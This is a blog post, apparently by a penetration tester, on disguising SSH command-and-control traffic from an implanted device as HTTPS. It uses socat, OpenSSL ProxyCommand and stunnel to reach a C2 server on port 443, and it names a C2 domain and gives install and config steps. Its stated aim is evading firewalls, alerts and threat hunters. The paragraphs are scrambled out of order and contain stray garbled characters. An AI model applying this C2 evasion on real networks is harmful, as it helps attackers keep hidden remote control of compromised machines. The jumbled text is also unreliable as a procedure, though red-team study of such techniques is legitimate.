This is because we are going to be hosting 3 services off this one port. ![]() You may be asking, “Why are we forwarding traffic to port 2222 instead of standard SSH (port 22)?” The following diagram is a visual of the steps we have taken so far: To enable it change “Enabled=0” to “Enabled=1”*Ĥ) Start service: ( Sudo service stunnel start) Setting these up are outside the scope of this paper, but you can read more about this on their website.ģ) Enable Stunnel in config (/etc/default/stunnel4): Forward & decrypt all incoming SSH traffic to port 443 to a port of your choice (2222 for us)įor our TLS certificates, we used Let’s Encrypt certificates that can be used for webpages.Listen on all interfaces on port 443 (HTTPS).Define rules for specified traffic type (SSH for us).*This will need to be created as it does not exist by default* In our case, it will be used to host the TLS certificates used for our encapsulation, decode incoming traffic, and forward the traffic to another port.ġ) The first step in our configuration is to install the software on the C2 server: ( Sudo apt install stunnel4)Ģ) Set up the configuration file (/etc/stunnel/nf): In short, Stunnel is a tool designed to add TLS encryption to applications that do not speak the protocols natively. Now that we have a means of encapsulating SSH traffic to our C2 server, we need something to receive and decrypt the traffic. What this configuration does, is that for any SSH connection to ‘ pc-tech.pro’ socat will be used to create a TLS tunnel using the site’s certificates for the SSH traffic to be encapsulated in. For our demonstration, we will use our ‘ pc-tech.pro’ domain for C2 (Ubuntu server hosted in Amazon AWS).ġ) Install Socat on implanted/rogue device ( Sudo apt install socat)Ģ) Modify our SSH config file for our user to use Prox圜ommand to establish a tunnel using OpenSSL to our C2 domain using port 443. Since we want to communicate with our C2 server using TLS, we can create this transfer pipe using OpenSSL. Socat is a tool that is used to transfer data between two addresses using a desired protocol. How does this benefit an attacker? Since these protocols encrypt the traffic within them, if we can use SSL/TLS to encapsulate SSH traffic, the SSH traffic would be shielded from detection (unless there is a security device in the middle that can decrypt the SSL/TLS traffic). TLS is the preferred method, as TLS is an updated more secure version of SSL. Any website where you see the lock icon next to the URL is using such encryption to protect your data. HTTPS traffic (encrypted HTTP) uses SSL/TLS (Secure Socket Layer/ Transport Layer Security) encryption to ensure that all communication between the web browser and the web server are safe from a third party seeing what is being transferred. The first step in emulating web traffic, is making our communication speak the same protocol as the normal traffic. ![]() Best part is they are free and open source. There are a few tools we can use to make this happen. As the most common outbound traffic is likely web traffic, lets emulate this. Even if neither of the above is blocked, anomalous outbound SSH traffic on any port is suspicious and may trigger alerts and/or attract unwanted attention from a threat hunter or analystĪs an attacker we always want to make any inbound/outbound traffic look as normal as possible to ensure the operational security of our campaign.Outbound SSH traffic over a non-standard port (22) may be blocked.Outbound SSH over port 22 may be blocked.But this requires an established external connection, where there are a few issues to consider: In campaigns I have performed, I have had scenarios where we needed to control a device remotely (such as a raspberry pi) where direct terminal access would be ideal (such as SSH). ![]() For example, maybe only web traffic over ports 80 (HTTP) and 443 (HTTPS) are allowed outbound from a given workstation. In certain environments, controls such as firewalls are in place that restrict outbound ports and protocols. SSL/TLS Tunneling to Bypass Filters & Avoid Detection
0 Comments
Leave a Reply. |
Details
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |